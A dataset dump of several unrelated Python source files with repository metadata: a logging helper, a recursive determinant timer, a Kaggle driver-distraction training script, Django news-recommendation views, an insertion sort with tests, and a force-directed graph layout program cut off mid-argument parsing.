        close(browser)
| [
"stasya.aska@gmail.com"
] | stasya.aska@gmail.com |
9275c08651f55414d12b7fc3bebe3109ef994156 | 1e505f77fa2509e79716b21088ed3a2a57cda73c | /logger.py | 3908636ff5a76c7f73c0702d9ff993d74da7d2dc | [] | no_license | sapph1re/tri-arb | 523cc44ad0760c200ac48cc8487de2539e612b8d | df34e06af0f0c4264b32b022a9509bf1b92348df | refs/heads/master | 2022-10-23T15:51:38.812783 | 2020-02-22T04:30:43 | 2020-02-22T04:30:43 | 131,799,758 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,096 | py | import logging
# from logging.handlers import RotatingFileHandler

# Detailed debug-file logging is currently disabled; the commented block
# below is kept for easy re-enabling.
# log_formatter_debug = logging.Formatter(
#     '%(asctime)s\t%(levelname)s\t[%(filename)s:%(lineno)s <> '
#     '%(funcName)s() <> %(threadName)s]\n%(message)s\n'
# )
# handler_debug = RotatingFileHandler('debug.log', mode='a', maxBytes=10000000)
# handler_debug.setLevel(logging.DEBUG)
# handler_debug.setFormatter(log_formatter_debug)

# Console handler shared by every logger this module creates: one-line
# format, INFO level and above.
log_formatter_info = logging.Formatter('%(asctime)s\t%(levelname)s\t[%(filename)s]\t%(message)s')
handler_console = logging.StreamHandler()
handler_console.setLevel(logging.INFO)
handler_console.setFormatter(log_formatter_info)
def get_logger(name):
    """Create a DEBUG-level logger wired to the shared console handler.

    Usage: logger = get_logger(__name__)
           logger.info('Some log message here')
    :param name: logger name, usually __name__ is fine
    :return: logger
    """
    log = logging.getLogger(name)
    log.setLevel(logging.DEBUG)
    # Console output only; the debug-file handler is disabled above.
    log.addHandler(handler_console)
    return log
| [
"dev.romanv@gmail.com"
] | dev.romanv@gmail.com |
b5837f8a5f00ad64d1fc1222080e6c5bfe305010 | 185b63f708319f7fcb6a3ef3ad7036d4a2ee169d | /l9-example-02a.py | 14c96dc7b76f51155953164abab5a00e5114f928 | [] | no_license | yipeichan/Numerical_Ananlysis_and_Programming | 222cdcaf62281ad0c3348b304c6f3addb53e2353 | 13175dbc3e30a376f1c5c94f1b54df6fad3f0aa6 | refs/heads/master | 2020-04-02T03:48:29.523292 | 2018-10-21T08:04:24 | 2018-10-21T08:04:24 | 153,985,352 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 664 | py | import numpy as np
import timeit
def det_rec(A):
    """Determinant of a square matrix by recursive cofactor expansion.

    Expands along the first row; recursion bottoms out at the 2x2 case.
    """
    if A.shape == (2, 2):
        return A[0, 0]*A[1, 1] - A[0, 1]*A[1, 0]
    total = 0.
    minor = np.zeros((A.shape[0] - 1, A.shape[1] - 1))
    for col in range(A.shape[1]):
        # Build the minor: drop row 0 and column `col`.
        minor[:, :col] = A[1:, :col]
        minor[:, col:] = A[1:, col + 1:]
        cofactor = A[0, col]*det_rec(minor)
        # Signs alternate along the first row.
        if col % 2 == 0:
            total += cofactor
        else:
            total -= cofactor
    return total
def speed_test(n):
    # Build a random n x n matrix and print its determinant (Python 2 print).
    A = np.random.rand(n**2).reshape((n,n))
    print '|A('+str(n)+'x'+str(n)+')| =',det_rec(A)
# Time the recursive determinant for sizes 2..10; the cofactor expansion
# grows factorially, so larger sizes slow down dramatically.
for n in range(2,11):
    t = timeit.timeit('speed_test('+str(n)+')',
        'from __main__ import speed_test',number=1)
    print '%.6f sec.\n' % t
| [
"noreply@github.com"
] | noreply@github.com |
dbe2f2833ba59cdba2a81d016967678ea2a4dc25 | 14b0395a375b443377922338b1a50c034d787617 | /main.py | e67becf45113de93bccd6e88904fa763ee360bda | [] | no_license | fucusy/kaggle-state-farm-distracted-driver-detection | 43d4d798069b10b577fad04fc866959d8a9f9823 | 81631f1d1c58767398501cc801a7d93b27e08682 | refs/heads/master | 2021-01-14T13:37:02.493061 | 2016-07-13T07:50:17 | 2016-07-13T07:50:34 | 58,187,723 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,643 | py | __author__ = 'fucus'
import os
from tool.keras_tool import load_data
import logging
import sys
import datetime
import config
from config import Project
from feature.utility import load_train_validation_feature
from feature.utility import load_test_feature
from tool.file import generate_result_file
from feature.utility import load_cache
from feature.utility import load_feature_from_pickle
from feature.utility import save_cache
from sklearn.metrics import classification_report
from sklearn.metrics import log_loss
import numpy as np
cache_path = "%s/cache" % Project.project_path
if __name__ == '__main__':
    # Pipeline: load cached VGG features for the train/validation/test
    # images, fit the configured model, report validation metrics, then
    # write the Kaggle submission file.
    level = logging.DEBUG
    FORMAT = '%(asctime)-12s[%(levelname)s] %(message)s'
    logging.basicConfig(level=level, format=FORMAT, datefmt='%Y-%m-%d %H:%M:%S')
    start_time = datetime.datetime.now()
    logging.info('start program---------------------')
    logging.info("loading feature cache now")
    train_img_folder = "/home/chenqiang/kaggle_driver_test_data/imgs/train"
    test_img_folder = "/home/chenqiang/kaggle_driver_test_data/imgs/test"
    feature_dir_list = ["%s/vgg_feature_l_31/" % cache_path]
    train_data, validation_data, test_data = load_data(train_img_folder, test_img_folder)
    train_y = train_data.get_image_label(to_cate=False)
    validation_y = validation_data.get_image_label(to_cate=False)
    logging.info("train_y shape %s" % str(train_y.shape))
    logging.info("validation_y shape %s" % str(validation_y.shape))
    feature_list = [None, None]
    for j, dataset in enumerate([train_data, validation_data]):
        for i, path in enumerate(dataset.image_path_list):
            # Concatenate this image's features from every cache directory.
            x = np.array([])
            img_base_name = os.path.basename(path)
            for feature_dir in feature_dir_list:
                feature_file_name = "%s/%s.npy" % (feature_dir, img_base_name)
                if os.path.exists(feature_file_name) and \
                    os.path.isfile(feature_file_name):
                    feature = np.load(feature_file_name)
                    x = np.append(x, feature, axis=0)
            if feature_list[j] is None:
                feature_list[j] = x
            else:
                feature_list[j] = np.vstack((feature_list[j], x))
            if i % 100 == 0:
                logging.info("load feature of %dth %s at dataset %d" % (i, path, j))
    train_data_feature = feature_list[0]
    validation_data_feature = feature_list[1]
    logging.info("load feature done")
    logging.info("train_data_feature shape %s" % str(train_data_feature.shape))
    logging.info("validation_data_feature shape %s" % str(validation_data_feature.shape))
    logging.info("start to train the model")
    Project.predict_model.fit(x_train=train_data_feature, y_train=train_y
                              , x_validation=validation_data_feature, y_validation=validation_y)
    logging.info("train the model done")
    logging.info("start to do validation")
    validation_result = Project.predict_model.predict(validation_data_feature)
    # Fix: sklearn's classification_report expects (y_true, y_pred); the
    # arguments were previously swapped.
    report = classification_report(validation_y, validation_result)
    logging.info("the validation report:\n %s" % report)
    # Fix: this line previously referenced the undefined name `validation_x`
    # and raised a NameError at runtime.
    validation_pro = Project.predict_model.predict_proba(validation_data_feature)
    logloss_val = log_loss(validation_y, validation_pro)
    logging.info("validation logloss is %.3f" % logloss_val)
    logging.info("done validation")
    logging.info("start predict test data")
    predict_result = None
    for i, path in enumerate(test_data.image_path_list):
        x = np.array([])
        img_base_name = os.path.basename(path)
        for feature_dir in feature_dir_list:
            feature_file_name = "%s/%s.npy" % (feature_dir, img_base_name)
            if os.path.exists(feature_file_name) and \
                os.path.isfile(feature_file_name):
                feature = np.load(feature_file_name)
                x = np.append(x, feature, axis=0)
        predict = Project.predict_model.predict_proba(x)
        if predict_result is None:
            predict_result = predict
        else:
            predict_result = np.vstack((predict_result, predict))
        if i % 100 == 0:
            logging.info("test image feature of %dth %s" % (i, path))
    logging.info("predict test data done")
    logging.info("start to generate the final file used to submit")
    generate_result_file(test_data.image_path_list, predict_result)
    logging.info("generated the final file used to submit")
    end_time = datetime.datetime.now()
    logging.info('total running time: %.2f second' % (end_time - start_time).seconds)
    logging.info('end program---------------------')
| [
"fucus@qq.com"
] | fucus@qq.com |
d1305985f70a0546282da08ce99ff4e125cbf4f5 | 4d7e7dd28bb3401046c958f6152fccc4474b01f6 | /src/NewsRecommendSys/views.py | 5e8d4960ce51987cb0dd750797e90d23d7750f32 | [] | no_license | huazhz/WebPortalCollection | a8bc47933270a09196b268b7de287ce21f1fc322 | c1caa5ab8b010e92da105e5b0513ac2bb7fcfdc8 | refs/heads/master | 2020-04-08T02:34:55.581878 | 2017-12-12T03:56:55 | 2017-12-12T03:56:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,415 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.http import HttpResponse
import os
import json
import re
import time
import traceback
from NewsDB.models import News
from UserDB.views import check_user_cookie
from UserDB.models import *
from NewsRecommendSys.models import *
# Path setup
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TMP_DIR = os.path.join(BASE_DIR, 'temp')
# Data preparation
# Helper functions
# View (response) functions
def user_recommend(request):
    """Return the recommended news list for the logged-in user as JSON.

    retcode: 0 ok, 403 bad cookie, 10001 no session user, 10010 server error.
    """
    result = {
        'retcode': 10000,
        'error_msg': '',
    }
    try:
        if not check_user_cookie(request):
            result['retcode'] = 403
            result['error_msg'] = 'illegal cookies'
            return HttpResponse(json.dumps(result), content_type='application/json')
        all_data = json.loads(request.body)
        p_user_name = request.session.get('user_name')
        if p_user_name:
            # Recommended URLs for this user -> full News rows -> dicts.
            user_recommend_set = UserToRecommendUrl.objects.filter(user_name=p_user_name)
            recommend_url_list = list(user_recommend_set.values_list('url', flat=True))
            news_set = News.objects.filter(url__in=recommend_url_list)
            result['news'] = [news.to_dict() for news in news_set]
            result['retcode'] = 0
        else:
            result['retcode'] = 10001
            result['error_msg'] = 'user not found'
    except:
        print traceback.format_exc()
        result['retcode'] = 10010
        result['error_msg'] = traceback.format_exc()
    return HttpResponse(json.dumps(result), content_type='application/json')
def record(request):
    """Record that the user read a news item (by url/title) as JSON.

    Creates UserToReadUrl and UserToDateTitle rows if they don't exist yet.
    retcode: 0 ok, 403 bad cookie, 10001 no session user, 10002 unknown
    news url, 10010 server error.
    """
    result = {
        'retcode': 10000,
        'error_msg': '',
    }
    try:
        if not check_user_cookie(request):
            result['retcode'] = 403
            result['error_msg'] = 'illegal cookies'
            return HttpResponse(json.dumps(result), content_type='application/json')
        all_data = json.loads(request.body)
        p_user_name = request.session.get('user_name')
        p_url = all_data['url']
        p_title = all_data['title']
        p_date = time.strftime('%Y-%m-%d', time.localtime(time.time()))
        if p_user_name:
            check_news_set = News.objects.filter(url=p_url)
            if check_news_set.exists():
                # Deduplicate before insert: one read-record per (user, url)
                # and per (user, title, date).
                check_read_url = UserToReadUrl.objects.filter(url=p_url, user_name=p_user_name)
                if not check_read_url.exists():
                    UserToReadUrl.objects.create(
                        url=p_url,
                        user_name=p_user_name
                    )
                check_date_title = UserToDateTitle.objects.filter(title=p_title, user_name=p_user_name, date=p_date)
                if not check_date_title.exists():
                    UserToDateTitle.objects.create(
                        title=p_title,
                        user_name=p_user_name,
                        date=p_date
                    )
                result['retcode'] = 0
            else:
                result['retcode'] = 10002
                result['error_msg'] = 'news not found'
        else:
            result['retcode'] = 10001
            result['error_msg'] = 'user not found'
    except:
        print traceback.format_exc()
        result['retcode'] = 10010
        result['error_msg'] = traceback.format_exc()
    return HttpResponse(json.dumps(result), content_type='application/json')
| [
"meng277277@gmail.com"
] | meng277277@gmail.com |
bf3f7b583721b3ecf7026781aeb8fe79e19dd324 | 203edf2aa1577cc3af7e7603af787023391bdc0f | /kata/sort/python/insertion_sort.py | 6b64f3078fb63e21398381bb765e9b1a13ba38bf | [] | no_license | 0x1001/Sandbox | 6776ee5a3d46467f070f117889b2b7fce15ffcd6 | 61c8592fbdde229921779055601eeaace73cdb8e | refs/heads/master | 2021-03-12T21:58:35.913975 | 2018-10-19T23:46:46 | 2018-10-19T23:46:46 | 16,882,836 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,261 | py | import unittest
def insertion_sort(list_to_sort):
    """Sort `list_to_sort` in place (ascending) and return it.

    Classic insertion sort: each element is swapped leftwards until it
    meets a smaller-or-equal neighbour. Stable; O(n) on already-sorted
    input thanks to the early break, O(n^2) worst case.
    """
    for idx_range in range(len(list_to_sort)):
        for idx in range(idx_range, 0, -1):
            if list_to_sort[idx - 1] > list_to_sort[idx]:
                list_to_sort[idx - 1], list_to_sort[idx] = list_to_sort[idx], list_to_sort[idx - 1]
            else:
                # Everything to the left is already sorted; stop early
                # (the original kept scanning, making every pass O(n)).
                break
    return list_to_sort
class Test_insertion_sort(unittest.TestCase):
    """Unit tests for insertion_sort: edge cases plus a randomized check."""
    def test_sort_empty(self):
        self.assertEqual(insertion_sort([]),[])
    def test_sort_one_element(self):
        self.assertEqual(insertion_sort([1]),[1])
    def test_sort_two_sorted_elements(self):
        self.assertEqual(insertion_sort([1,2]),[1,2])
    def test_sort_two_unsorted_elements(self):
        self.assertEqual(insertion_sort([2,1]),[1,2])
    def test_sort_three_unsorted_elements(self):
        self.assertEqual(insertion_sort([2,1,3]),[1,2,3])
    def test_sort_three_reverse_elements(self):
        self.assertEqual(insertion_sort([3,2,1]),[1,2,3])
    def test_sort_random_numbers(self):
        # Compare against list.sort() on 1000 random values.
        import random
        random_list = [random.randint(0,100) for i in range(1000)]
        sorted_list = insertion_sort(random_list[:])
        random_list.sort()
        self.assertEqual(sorted_list,random_list)
if __name__ == "__main__":
unittest.main() | [
"damian.nowok@gmail.com"
] | damian.nowok@gmail.com |
38c8bf880e63be5f53e704346d9e501f8a47d640 | eb6b322096aee65c8d29debdc66d7334928be1c8 | /check_palindrome.py | 43eeec962ec82db4926410b61941d90fb495d2fe | [] | no_license | Hrishikeshbele/Competitive-Programming_Python | 821128d7317313e23704ad5d9d5c8a4a58e420da | 9bfe9ff084fc10010ba438e1a41c8ea83736366b | refs/heads/master | 2021-06-29T02:50:56.959332 | 2020-12-22T06:34:29 | 2020-12-22T06:34:29 | 189,185,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 465 | py | '''
check if given string is pelindrome.
solution idea: iteratively check if last letter and first letter of string are equal if not then return false if yes check of substring
excluding first and last elm and basic condition is if len of str is less than 2 then it should be pelindrome so return true
'''
def ispalindrome(word):
if len(word) < 2:
return True
if word[0] != word[-1]:
return False
return ispalindrome(word[1:-1])
| [
"noreply@github.com"
] | noreply@github.com |
7f2113c67ad293e9a2de887c178963ddd9dadebe | 6f2d672f62add5a5a41ab6560804b856671813ce | /mud/core/signals.py | ab159a1dc167c05a627e44484b6016f4930c6ea5 | [] | no_license | rabbitmq/flying-squirrel-demos | 490d85378ae5e77d464a98cc4b011861604007a5 | d3a3060aaab433d11e225bda3d3e79125753ee7e | refs/heads/master | 2023-06-24T22:25:41.851835 | 2015-02-18T14:23:11 | 2015-02-18T14:23:11 | 1,929,367 | 3 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,013 | py | import logging
log = logging.getLogger(__name__)
import datetime
import django.dispatch
from . import models
from . import trigger
tick_event = django.dispatch.Signal(providing_args=["curr_time"])
def cleanup_connections(sender, curr_time=None, **kwargs):
t0 = curr_time - datetime.timedelta(seconds = 60)
for conn in models.Connection.objects.filter(modified__lt=t0):
actor = conn.char
log.info(" [*] %s (%s) disconnected", actor, conn.reply_to)
conn.send("Come back to us later.")
conn.send("Disconnected...")
conn.delete()
if actor and not actor.is_npc and actor.connection_set.count() == 0:
# Last connection lost, moving to limbo
actor.render_to_others('to_limbo.txt')
actor.room_id = 1
actor.save()
tick_event.connect(cleanup_connections)
# Load all npc modules.
def load_npc():
for actor in models.Char.objects.filter(is_npc=True):
trigger.action('load', actor=actor)
load_npc()
| [
"marek@rabbitmq.com"
] | marek@rabbitmq.com |
a027e6796b5efd74e8c545ff703576337f976659 | 43d6effb34eaeedcba72b74267699e338874cde4 | /jiayj267/DS.py | eccfea4531c335cf23792dfbc61d140868fb98e7 | [] | no_license | yaxiaojie/BioData | 7d6628db60adb320980201ea079d9d8fe15749bd | c9a5942298f6f9ee448a204c356da9afd8119d8a | refs/heads/master | 2020-05-21T03:53:39.026356 | 2019-05-10T01:53:10 | 2019-05-10T01:53:10 | 185,899,633 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 823 | py | """
Author:Xian Tan
Aim:Storage dictionary type data to Biodata database(for testing)
data:18/1/23
"""
import pymongo
from pymongo import MongoClient
class DataStorage:
def __init__(self, name):
self.name = name
self.path = self._login()
def _login(self):
client = pymongo.MongoClient("59.73.198.168", 27017)
db = client['Biodata']
db.authenticate("Fangxy", "123456")
collection = client['Biodata'][self.name]
return collection
def Storage(self, dic):
return self.path.insert(dic)
"""
You can use this class to test your code
Firstly you can do Storage = DS.DataStorage(Name) Name is your database's name
Then when you get a dic. type data,use Storage.Storage(Name2) Name2 is your data's name
Have fun
"""
| [
"noreply@github.com"
] | noreply@github.com |
ba2562d3ccd2489e74728d05752cdb0c596ab32e | f3182e281435d59a23055bb74594a85daaa957c8 | /venv/module_test01.py | 6f36a42915587cc987080f5ae2f59b9db3d60e81 | [] | no_license | 39004404/pyProject | b42aa9998b0383a9530ba1513d90db33e341a2bd | 972a7074456cac6d0728f626390ab54313399887 | refs/heads/master | 2020-04-11T07:08:14.938126 | 2018-12-13T07:52:31 | 2018-12-13T07:52:31 | 161,602,301 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | # -*- encoding:utf-8 -*-
import module_name
print("This is module_test01.py")
print(type(module_name))
print(module_name)
| [
"xiezuom@126.com"
] | xiezuom@126.com |
fb785b48dbc3883bf3983cf9a771dd2f9a6bb328 | 4a44d785d19f23033ec89775c8219a2f8275a4dd | /cride/circles/admin.py | a7031ba8c50be95f1f6624a720fbf3187af1f7ce | [
"MIT"
] | permissive | mdark1001/crideApiRest | d17989dfb650eb799c44c57d87f3e0cec8fc647b | 228efec90d7f1ad8a6766b5a8085dd6bbf49fc8a | refs/heads/main | 2023-04-09T23:27:09.931730 | 2021-04-19T13:46:44 | 2021-04-19T13:46:44 | 357,706,873 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 312 | py | from django.contrib import admin
# Register your models here.
from .models import Circle
@admin.register(Circle)
class CircleAdmin(admin.ModelAdmin):
list_display = ['name', 'is_verified', 'is_public', 'rides_taken', 'rides_offered']
list_filter = ['created', 'is_verified', 'is_public','is_limited']
| [
"miguel.cabrera.app@gmail.com"
] | miguel.cabrera.app@gmail.com |
c3d4e78417f43c5eea54511c6315f097dedbc64f | 5b8829f32459b711c41762200a931195dac7e2ea | /2Año/Complementos de Matematica 1/TPFinal/tp.py | f5af90bc21add0f76f631d5013a582f7c9c4125d | [] | no_license | alejosilvalau/cs-ruffa97 | ee19df9ccef60c40f8ce24d9c35a314ee384285a | d51c884d84a1e63e33e9d92e6c2c5732b5bf16a7 | refs/heads/master | 2023-08-16T15:08:12.126843 | 2020-08-05T04:09:01 | 2020-08-05T04:09:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,300 | py | #! /usr/bin/python
# 6ta Practica Laboratorio
# Complementos Matematicos I
# Ejemplo parseo argumentos
import argparse
import matplotlib.pyplot as plt
import numpy as np
import math
import random
import time
from collections import defaultdict
'''
Parametros de layout:
grafo: tupla que representa nuestro grafo en formato Lista
pos_x: diccionario que tiene como clave los vertices y guarda sus posiciones con respecto al eje x
pos_y: idem pos_x con el eje y
accum_x: diccionario que acumula las fuerzas aplicadas a cada uno de los vertices en direccion horizontal
accum_y: idem accum_x en direccion vertical
w: ancho de la pantalla donde se dibuja el grafo
l: alto de la pantalla donde se dibuja el grafo
g: fuerza de gravedad, genera una atraccion hacia el centro de la pantalla
t: temperatura inicial
p: constante de enfriamiento
iters: cantidad de iteraciones a realizar
verbose: booleano que al estar activado, hace que el programa nos muestre informacion mientas corre
optimize: booleano que al estar activado, hace utilizar un algoritmo optimizado
refresh: Numero de iteraciones entre actualizaciones de pantalla.
0 -> se grafica solo al final.
c1: constante usada para calcular la repulsion entre nodos
c2: constante usada para calcular la atraccion de aristas
k: constante usada para el calculo de las fuerzas, la cual depende de la cantidad de vertices, dada en el paper
columns: constante que representa la cantidad de columnas de la grilla.
rows: constante que representa la cantidad de filas de la grilla.
grid: grilla utlizada para la optimizacion del calculo de la fuerza de repulsion.
squares: diccionario que tiene como clave los vertices y como dato el cuadrante al que corresponde.
'''
class LayoutGraph:
def __init__(self, grafo, g, t, iters, refresh, c1, c2, verbose=False, optimize=False):
# Guardo el grafo
self.grafo = grafo
# Inicializo estado
self.pos_x = defaultdict(lambda :0)
self.pos_y = defaultdict(lambda :0)
self.accum_x = defaultdict(lambda :0)
self.accum_y = defaultdict(lambda :0)
self.w = 1500
self.l = 1500
self.g = g
self.t = t
self.iters = iters
self.verbose = verbose
self.optimize = optimize
self.refresh = refresh
self.c1 = c1
self.c2 = c2
self.k = (math.sqrt((self.w*self.l)/len(self.grafo[0])))
if(self.optimize):
self.columnas = int(self.w/(2*self.k))
self.filas = int(self.l/(2*self.k))
self.cuadrante = self.init_cuadrante()
self.cuadricula = defaultdict(lambda :(0,0))
'''
Toma un mensaje y lo imprime si el modo verbose esta activado
'''
def info(self,msg):
if self.verbose:
print(msg)
def info_accum(self):
vertices=self.grafo[0]
if self.verbose:
print("Acumuladores: ")
for v in vertices:
print("Vertice "+ str(v) + ": accum_x = " + str(self.accum_x[v]) + ": accum_y = " + str(self.accum_y[v]))
print("\n")
def info_pos(self):
vertices=self.grafo[0]
if self.verbose:
print("Posiciones: ")
for v in vertices:
print("Vertice "+ str(v) + ": pos_x = " + str(self.pos_x[v]) + ": pos_y = " + str(self.pos_y[v]))
print("\n")
'''
Inicializa la posicion de los vertices en posiciones aleatorias
'''
def randomize_position(self):
vertices=self.grafo[0]
for n in vertices:
x = random.randint(1,self.w-1)
y = random.randint(1,self.l-1)
self.pos_x[n] = x
self.pos_y[n] = y
'''
Idem randomize_position pero luego de generar las posiciones calcula en q cuadrante
pertence cada vertice
'''
def randomize_position_op(self):
vertices=self.grafo[0]
for n in vertices:
x = random.randint(1,self.w-1)
y = random.randint(1,self.l-1)
self.pos_x[n] = x
self.pos_y[n] = y
sq = self.calc_cuadricula(n)
self.cuadrante[sq].append(n)
self.cuadricula[n] = sq
'''
Pone los acumuladores en 0
'''
def reset_accum(self):
vertices=self.grafo[0]
for n in vertices:
x = random.randint(1,self.w-1)
y = random.randint(1,self.l-1)
self.accum_x[n] = 0
self.accum_y[n] = 0
'''
Calcula la distancia euclidida entre dos puntos
'''
def calc_dist(self,x1,x2,y1,y2):
f = math.sqrt(((x2-x1)**2)+((y2-y1)**2))
return f
'''
Toma dos vertices y devuelve la distancia que los separa
'''
def dist(self,v1,v2):
f = self.calc_dist(self.pos_x[v1],self.pos_x[v2],self.pos_y[v1],self.pos_y[v2])
return f
'''
Divide la pantalla en cuadrantes, segun tamaño y cantidad de vertices
'''
def init_cuadrante(self):
cuadrante = {}
for i in range (self.columnas+1):
for j in range (self.filas+1):
cuadrante[(i,j)]=[]
return cuadrante
'''
Dado un vertice se le asigna ek cuadrante que corresponde
'''
def calc_cuadricula(self, n):
x = int(self.pos_x[n] / (2*self.k))
y = int(self.pos_y[n] / (2*self.k))
return (x,y)
'''
Calcula la fuerza de atraccion de dos vertices unidos por una arista y actualiza
el valor de los acumuladores
'''
def f_attraction(self):
self.info("Calculando fuerzas de atraccion...\n")
vertices=self.grafo[0]
aristas=self.grafo[1]
for (v1,v2) in aristas:
dist = self.dist(v1,v2)
if(dist < 0.5):
continue
mod_fa = (dist**2 / self.k*self.c2)
fx = mod_fa*(self.pos_x[v2] - self.pos_x[v1]) / dist
fy = mod_fa*(self.pos_y[v2] - self.pos_y[v1]) / dist
self.accum_x[v1] += fx
self.accum_y[v1] += fy
self.accum_x[v2] -= fx
self.accum_y[v2] -= fy
self.info_accum()
'''
Para cada vertice calcula el valor de la fuerza de repulsion ejercida a los demas vertices
actualizando el valor de los acumuladores
'''
def f_repulsion(self):
self.info("Calculando fuerzas de repulsion...\n")
vertices=self.grafo[0]
aristas=self.grafo[1]
for n1 in vertices:
for n2 in vertices:
if (n1 == n2):
continue
dist = self.dist(n1,n2)
if(dist<1):
fx = random.randint(-10,10)
fy = random.randint(-10,10)
else:
mod_fr = ((self.k*self.c1)**2 / dist)
fx = mod_fr*(self.pos_x[n2]-self.pos_x[n1]) / dist
fy = mod_fr*(self.pos_y[n2]-self.pos_y[n1]) / dist
self.accum_x[n2] += fx
self.accum_y[n2] += fy
self.info_accum()
'''
Version optimizada del calculo de la fuerza de repulsion para el modo
optimize
'''
def f_repulsion_op(self):
self.info("Calculando fuerzas de repulsion...\n")
vertices=self.grafo[0]
aristas=self.grafo[1]
for n1 in vertices:
sq = self.cuadricula[n1]
self.cuadrante[sq].remove(n1)
inix = max(sq[0]-1, 0)
endx = min(sq[0]+1, self.columnas)
iniy = max(sq[1]-1, 0)
endy = min(sq[1]+1, self.filas)
for i in range(inix, endx+1):
for j in range(iniy, endy+1):
for n2 in self.cuadrante[(i,j)]:
dist = self.dist(n1, n2)
if (dist<2*self.k):
if(dist<1):
fx = random.randint(-10,10)
fy = random.randint(-10,10)
else:
mod_fr = ((self.k*self.c1) / dist)
fx = mod_fr*(self.pos_x[n2]-self.pos_x[n1]) / dist
fy = mod_fr*(self.pos_y[n2]-self.pos_y[n1]) / dist
self.accum_x[n1] -= fx
self.accum_y[n1] -= fy
self.accum_x[n2] += fx
self.accum_y[n2] += fy
self.info_accum()
'''
Calcula la fuerza de gravedad de atraccion de cada vertice hacia el centro
de la pantalla
'''
def f_gravedad(self):
vertices = self.grafo[0]
for v in vertices:
dist = self.calc_dist(self.pos_x[v], self.w/2, self.pos_y[v], self.l/2)
fx = self.g * (self.w/2 - self.pos_x[v]) / dist
fy = self.g * (self.l/2 - self.pos_y[v]) / dist
self.accum_x[v] += fx
self.accum_y[v] += fy
self.info_accum()
'''
Actualiza las posiciones de los vertices en funcion de las fuerzas calculadas
anteriormente.
El valor maximo de desplazamiento estara condicionado por el valor actual
de la temperatura
'''
def actual_pos(self):
vertices=self.grafo[0]
for v in vertices:
mod = math.sqrt(self.accum_x[v]**2 + self.accum_y[v]**2)
if(mod > self.t):
self.accum_x[v] = (self.accum_x[v] / mod) * self.t
self.accum_y[v] = (self.accum_y[v] / mod) * self.t
self.pos_x[v] = self.pos_x[v] + self.accum_x[v]
if(self.pos_x[v]<1):
self.pos_x[v]=1
if(self.pos_x[v]>(self.w-1)):
self.pos_x[v]=(self.w-1)
self.pos_y[v] = self.pos_y[v] + self.accum_y[v]
if(self.pos_y[v]<1):
self.pos_y[v]=1
if(self.pos_y[v]>(self.l-1)):
self.pos_y[v]=(self.l-1)
self.info_pos()
'''
Idem actual_pos pero luego de actualizar la posicion calcula para cada
vertice su nuevo cuadrante
'''
def actual_pos_op(self):
vertices=self.grafo[0]
for v in vertices:
mod = math.sqrt(self.accum_x[v]**2 + self.accum_y[v]**2)
if(mod > self.t):
self.accum_x[v] = (self.accum_x[v] / mod) * self.t
self.accum_y[v] = (self.accum_y[v] / mod) * self.t
self.pos_x[v] = self.pos_x[v] + self.accum_x[v]
if(self.pos_x[v]<1):
self.pos_x[v]=1
if(self.pos_x[v]>(self.w-1)):
self.pos_x[v]=(self.w-1)
self.pos_y[v] = self.pos_y[v] + self.accum_y[v]
if(self.pos_y[v]<1):
self.pos_y[v]=1
if(self.pos_y[v]>(self.l-1)):
self.pos_y[v]=(self.l-1)
sq = self.calc_cuadricula(v)
self.cuadrante[sq].append(v)
self.cuadricula[v] = sq
self.info_pos()
'''
Disminuye la temperatura en cada step
'''
def actual_temp(self):
self.t = 0.95 * self.t
'''
Ejecuta las funciones definidas anteriormente. Primero resetea los acumuladores, despues
calcula las fuerzas de atraccion repulsion y gravedad y por ultimo actualiza las posicoines
y la temperatura
'''
def step(self, grafico):
self.reset_accum()
self.f_attraction()
self.f_repulsion()
self.f_gravedad()
self.actual_pos()
self.actual_temp()
'''
Idem step, solo que usando las funciones optimizadas.
'''
def step_op(self, grafico):
self.reset_accum()
self.f_attraction()
self.f_repulsion_op()
self.f_gravedad()
self.actual_pos_op()
self.actual_temp()
'''
Grafica el grafo
'''
def ploteo(self):
plt.ion()
for vertice in self.grafo[0]:
plt.scatter(self.pos_x[vertice],self.pos_y[vertice])
for arista in self.grafo[1]:
plt.plot([self.pos_x[arista[0]],self.pos_x[arista[1]]],[self.pos_y[arista[0]],self.pos_y[arista[1]]])
plt.show()
plt.pause(0.01)
plt.clf()
#return gr
'''
Aplica el algortimo y lo muestra en pantalla
'''
def layout(self):
pos = self.randomize_position()
plt.ion()
grafico = self.ploteo()
iniciar_tiempo = time.time()
it = 0
if (self.refresh == 0):
while(self.t > 0.1 and it<self.iters):
self.step(grafico)
it+=1
else:
while(self.t > 0.1 and it<self.iters):
for i in range(self.refresh):
self.step(grafico)
it+=1
if(self.t <= 0.1):
break
self.ploteo()
self.ploteo()
'''
Layout utilizando funciones optimizadas
'''
def layout_op(self):
self.info("Modo optimize activado")
pos = self.randomize_position_op()
plt.ion()
grafico = self.ploteo()
iniciar_tiempo = time.time()
it = 0
if (self.refresh == 0):
while(self.t > 0.1 and it<self.iters):
self.step_op(grafico)
it+=1
else:
while(self.t > 0.1 and it<self.iters):
for i in range(self.refresh):
self.step_op(grafico)
it+=1
if(self.t <= 0.1):
break
self.ploteo()
self.ploteo()
def read_file_graph(file_name):
f = open(file_name, "r")
lines = f.readlines();
q = int(lines[0])
vertices = []
for i in range(q):
v = lines[i+1].split()
vertices.append(str(v[0]))
lines = lines[q+1:]
edges = []
for s in lines:
l = s.split()
edges.append((str(l[0]), str(l[1])))
graph = (vertices, edges)
return graph
def main():
# Definimos los argumentos de linea de comando que aceptamos
parser = argparse.ArgumentParser()
# Verbosidad, opcional, False por defecto
parser.add_argument(
'-v', '--verbose',
action='store_true',
help='Muestra mas informacion al correr el programa'
)
# Cantidad de iteraciones, opcional, 50 por defecto
parser.add_argument(
'--iters',
type=int,
help='Cantidad de iteraciones a efectuar',
default=100
)
